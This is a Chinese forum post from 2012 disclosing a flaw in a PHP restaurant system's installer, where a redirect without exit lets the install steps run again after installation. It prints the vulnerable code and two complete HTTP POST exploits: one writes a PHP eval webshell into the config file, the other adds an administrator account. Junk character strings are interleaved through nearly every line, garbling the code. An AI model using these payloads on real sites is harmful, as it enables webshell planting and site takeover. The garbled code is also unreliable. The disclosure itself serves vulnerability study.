问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。
0 t' x# |) q' m" g3 N+ _$ }7 e) V2 w+ A2 |, }6 ~
<?php+ F. J R0 |# ^* d# n$ g: b
if(file_exists("../install.lock"))0 W$ _" I7 I* [7 D
{
- y( y2 R" C: W header("Location: ../");//没有退出' ?% w: Z) a- d; s% |) \
}- O! i# ?- `- B7 c$ o- p2 K5 L
+ u: x0 G" f+ S: q
//echo 'tst';exit;
" _9 P& f, e4 P, j! ]' `5 C. drequire_once("init.php");
; r! u7 N" F. b& x/ gif(empty($_REQUEST['step']) || $_REQUEST['step']==1)
+ N, B f, Y( e{
7 R2 j' N! L2 @' H( M可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。
+ h& H" }# k6 `4 L& z6 S1 B! m9 r3 b
" O6 _/ t# m' p5 }9 A1、getshell(很危险)
% j/ a$ h" N7 Q ]7 t, E- c# sif(empty($_REQUEST['step']) || $_REQUEST['step']==1)
& ]. G0 e( j/ h, q, R1 I& [{# h; n) n/ H2 e3 Q$ H! t# g
$smarty->assign("step",1);
$ K. @+ J2 e6 @, [8 L+ f) x$smarty->display("index.html");! e4 ^* t" Z* Q2 Q
}elseif($_REQUEST['step']==2)
' b. g7 ]( h7 i! J{
0 N4 _# z e- K5 M $mysql_host=trim($_POST['mysql_host']);
; V3 i4 @1 h. _! X' [! N, I+ q; @$ j $mysql_user=trim($_POST['mysql_user']);
/ z& j( T$ X, `) {# c+ u $mysql_pwd=trim($_POST['mysql_pwd']);
% Y I& V6 P6 |+ c5 A8 h) ~ $mysql_db=trim($_POST['mysql_db']);: x* l! \6 M" t2 B/ k
$tblpre=trim($_POST['tblpre']);1 Q+ c( F" M' |- H3 R8 Z
$domain==trim($_POST['domain']);7 h2 H* y2 w1 h$ o
$str="<?php \r\n";. E) c) z7 l8 t( `5 S6 `% b& }
$str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";
& V4 P" f& D; H. y3 p; V $str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
/ j- U7 K# `( g% U% I: X $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";. [( V' i7 {+ K* Q( ]
$str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";* J+ @ S5 j" W8 |4 I- {
$str.='define("MYSQL_CHARSET","GBK");'."\r\n";. m7 n. |* R8 o u! w" u
$str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";" h9 e* D A! w* p
$str.='define("DOMAIN","'.$domain.'");'."\r\n";
/ N/ h2 P" J7 ~ l, e% P $str.='define("SKINS","default");'."\r\n";1 Z$ H- R+ B) O; z. H/ g
$str.='?>';$ Z. x, c6 L& x" j, f
file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件
0 V7 t1 J" |: n2 G* D上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马- X5 x9 H' P4 ^
POST /canting/install/index.php?m=index&step=2 HTTP/1.1
1 J0 J3 ^6 J0 ^6 L. q% DHost: 192.168.80.129
8 R- ^7 J+ H% k& P% d9 T) c! sUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0' J' j$ M3 K( S1 ^. l1 h& S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.82 f6 x/ Z( X! K9 F: l2 n$ i; {
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3/ ~, j. |6 j3 C
Accept-Encoding: gzip, deflate; d' j) G* l8 w# b0 o
Referer: http://192.168.80.129/canting/install/index.php?step=1
( S% j3 R4 \5 D, h9 n2 ~& k9 UCookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42- L. A v& f0 h$ w$ U2 s. Q
Content-Type: application/x-www-form-urlencoded3 j+ W% c6 h1 J8 _6 o: e
Content-Length: 126
0 N7 D( M9 k0 l * [9 K2 q$ D% U7 U& ~- A) F
mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD. A% q9 u! a2 I/ u# C: w
但是这个方法很危险,将导致网站无法运行。
# R+ D) k: l( n1 u0 g. F+ z/ p( g* [. P! K
2、直接添加管理员+ \' [6 T2 g6 W6 n) B; a
# W7 J, d: N" C9 j* eelseif($_REQUEST['step']==5)
* N# [ _2 [0 j; J0 B3 |0 L0 B{$ E5 z7 A/ g/ O8 L2 k- ^# H0 ?
if($_POST)
- T' f, n' c! h6 j { require_once("../config/config.inc.php");
! Y8 P& r: m9 {' U1 w $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
) A2 k0 s# f) i# I$ h mysql_select_db(MYSQL_DB,$link);3 I; M# x' y" v
mysql_query("SET NAMES ".MYSQL_CHARSET );
& w+ B0 F$ p, n8 M* D2 J% f mysql_query("SET sql_mode=''");
/ p9 c0 L1 z O; b. n7 N1 y G! x J O5 ]- P7 i
$adminname=trim($_POST['adminname']);- t" O8 k x% ~3 k: a6 q" a3 e$ `
$pwd1=trim($_POST['pwd1']);
0 }' W3 H. P- w7 R+ d2 c$ k" r' V $pwd2=trim($_POST['pwd2']);
$ L* l( @1 K$ w" B( b8 ~ if(empty($adminname))
' _0 E0 P* q/ ~) [# ^$ a" I {
5 i8 D; e" }. m/ P6 {4 f9 v
+ _1 z+ v" ~( x3 v' G echo "<script>alert('管理员不能为空');history.go(-1);</script>";
. D1 O& [/ Q$ o8 J9 ]1 X5 y- t4 c( j exit();* Z. Z" y7 t+ p
}( i. a* V/ q, T# g$ m
if(($pwd1!=$pwd2) or empty($pwd1))* b R* z2 a; K% ?5 H: o) X
{$ a: n3 C. [% i; y: i7 K
echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出
& X( {, {1 i1 S9 [ o* I4 u/ ^! a& _8 Y }2 H& c7 w! y- s# S1 b
mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员2 E9 X, H* O1 T" h: k. L+ ~4 p
}
\: q6 @1 N! j1 S# m: [这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:
* m! O7 F4 h: |* M# X* FPOST /canting/install/index.php?m=index&step=5 HTTP/1.1" ?2 |/ }) {+ v) Y- m
Host: 192.168.80.129
5 F+ P6 k- [$ U3 m$ G/ m6 B8 u) J9 p! k: vUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
' r8 W: A1 J0 B% }4 O1 NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
( M4 |! ^7 h7 e( w Y% q6 Z* }Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3) z( x+ u# x3 d4 f3 v1 c1 P- U5 l$ y
Accept-Encoding: gzip, deflate
2 X- {# f6 b: o- K- tReferer: http://www.2cto.com /canting/install/index.php?step=1
2 N+ D& U! p5 U- }Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
# q1 A; `/ T+ F+ t4 `( ~& hContent-Type: application/x-www-form-urlencoded
( _2 b' A. r; t3 a. FContent-Length: 46/ w# @" [. c* m: B, [ e
3 r* Y' e0 ?1 m# M* j. V( L: g& wadminname=qingshen&pwd1=qingshen&pwd2=qingshen
, J( Y8 I& W" F4 Y0 J |
发表于 2012-12-4 11:13:44
收藏
支持
反对